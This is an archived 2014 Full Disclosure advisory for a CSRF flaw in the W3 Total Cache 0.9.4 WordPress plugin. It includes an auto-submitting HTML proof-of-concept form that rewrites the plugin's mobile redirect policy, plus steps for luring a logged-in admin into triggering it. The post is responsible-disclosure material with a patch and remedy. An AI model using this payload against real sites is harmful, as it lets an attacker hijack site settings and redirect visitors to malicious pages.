lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 16 Dec 2014 11:38:38 -0500
From: Mazin Ahmed <mazen150@...mail.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] W3TotalFail: W3 Total Cache v 0.9.4 CSRF Vulnerability that
 Leads to Full Deface

####
# Title: W3TotalFail: W3 Total Cache v 0.9.4 CSRF Vulnerability that Leads to Full Deface
# Author: Mazin Ahmed
##
# Date of Discovering: October 6th, 2014
# Date of Reporting to the Vendor: October 7th, 2014
# Date of Releasing a Patch: December 9th, 2014
##
# Vulnerability Type: Cross-Site Request Forgery (CSRF) - CWE-352
##
# Vendor Homepage: https://www.w3-edge.com/
##
# Affected Version: 0.9.4, previous versions might be vulnerable as well.
# Affected Software Link: https://downloads.wordpress.org/plugin/w3-total-cache.0.9.4.zip
# Patch Link: https://downloads.wordpress.org/plugin/w3-total-cache.0.9.4.1.zip
# Tested on: Wordpress 4.0
# Blog Post: http://mazinahmed1.blogspot.com/2014/12/w3-total-caches-w3totalfail.html
# POC Video: https://www.youtube.com/watch?v=JwRteg7Iqyw
####

###Description:
W3 Total Cache v0.9.4 is vulnerable to a critical Cross-Site Request Forgery issue. It occurs because of the invalidation of the CSRF token "_wpnonce". This CSRF issue can be used to perform many actions, but the most significant action that has the biggest impact on users is redirecting users to malicious websites. This can be happened by using the feature of specify particular user-agents to be redirected to mobile site. By crafting an exploit that forces the victim to change the policy feature's policy to redirect every user who visit the victim's website to be redirected to a specific website that is specified by the attacker. This can be done by adding all the common keywords that is used on user-agents.

###Exploit:
------------------------------------------------------------------------------------------------------------------------------
<html>
		 <body onload="javascript:document.csrf_form.submit()"> 
	<form method="post" action="http://localhost/wordpress/wp-admin/admin.php?page=w3tc_mobile" name="csrf_form"> 
<input type="hidden" name="mobile_groups[exploit_by_mazen160][enabled]" value="0">
<input type="hidden" name="mobile_groups[exploit_by_mazen160][enabled]" value="1">
<input type="hidden" name="mobile_groups[exploit_by_mazen160][theme]" value="">
<input type="hidden" name="mobile_groups[exploit_by_mazen160][redirect]" value="https://twitter.com/mazen160">
<input type="hidden" name="mobile_groups[exploit_by_mazen160][agents]" value="Mozilla
Opera
iTunes
ELinks
Links 
Konqueror
Midori
Uzbl (Webkit 1.3)
w3m
Lynx
POLARIS
nook
BlackBerry
LG
MOT
Nokia
SEC
Sony
Baiduspider
Google
msnbot
Email
Gaisbot
grub
Download
Wget
curl">
<input type="hidden" name="_wp_http_referer=" value="http://localhost/wordpress/wp-admin/admin.php?page=w3tc_mobile">
<input type="hidden" name="w3tc_save_options" value="Save+all+settings"/>
<input type="hidden" name="_wpnonce" value=""> 
<input type="hidden" name="w3tc_note" value="config_save"> 
	</form>
		</body> 
</html>
------------------------------------------------------------------------------------------------------------------------------

###Vulnearble Versions:
The issue has been confirmed on W3 Total Cache (v0.9.4). Previous versions might be vulnerable as well.

###Severity: Critical 

###Steps to Reproduce:
1- An attacker uploads the exploit to an accessible server 
2- The attacker sends a link of the exploit to the victim (who is using W3 Total Cache) 
3- The victim clicks on the link (while he is authenticated), and the exploit run on the victim's client-side 
4- The victim's website settings will be changed, and anyone who visits the victim's website will be redirected to the attacker's malicious website. 

###Remedy:
Update W3 Total Cache plugin to the latest version.

Best Regards,
Mazin Ahmed
https://twitter.com/mazen160
http://mazinahmed1.blogspot.com
https://linkedin.com/pub/mazin-ahmed/86/795/629 		 	   		  

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists